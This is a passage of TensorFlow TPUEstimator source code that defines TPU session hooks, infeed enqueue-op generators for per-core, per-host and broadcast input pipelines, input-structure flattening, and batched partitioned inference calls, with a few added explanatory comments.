logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
the following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved, avoiding a race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value`, `unit`] that
represents either the number of iterations or the time in seconds to run
the optimizer per loop, depending on whether `unit` is `count` or
`seconds`.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit`')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
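# Worked example (editorial sketch): with final_step=1000, global_step=996 and
# an estimator suggestion of 32 iterations, the next loop runs
# min(1000 - 996, 32) = 4 iterations, so training stops exactly at step 1000.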
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of (`final_step` -
`global_step`) and the initial estimated iterations returned by the
estimator (1 by default).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to a
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model, but it makes
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately.
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing this as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
A list of enqueue ops, or a dict containing the enqueue ops and signals.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# For each core, slice out its share of the flattened_inputs.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flattening/unflattening is handled by `_InputPipeline`. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is called, the body function, which invokes the
# `enqueue_fn` passed in, is called to construct the graph, so the input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is the dtypes and shapes, so any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
would error out to give users a better error message, but if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so we log a warning instead.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
experimental_export_device_assignment,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes the computation inputs and builds
the computation graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_export_device_assignment: If `True`, use user-provided device
assignment. If `False`, round-robin computation among all TPU cores
visible to the host.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
if experimental_export_device_assignment:
return computation(computation_inputs)
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=True)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using Batching Function but use TPUPartitionedCall/all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
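# Illustrative sketch (editorial): a `batch_config` for the batched path above
# might be constructed with placeholder values such as
#   batch_config = BatchConfig(
#       num_batch_threads=2, max_batch_size=8, batch_timeout_micros=5000,
#       allowed_batch_sizes=[2, 4, 8], max_enqueued_batches=10)
# The field names mirror the attributes accessed in the decorator above; the
# `BatchConfig` named tuple itself is referenced in the docstring but not
# defined in this excerpt, so its constructor here is an assumption.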
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs the necessary checks and mutations required by TPU training and
evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides, the input should be taken from the TPU infeed rather
than from the input pipeline (input_fn) directly. To fit the TPU loop-and-replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
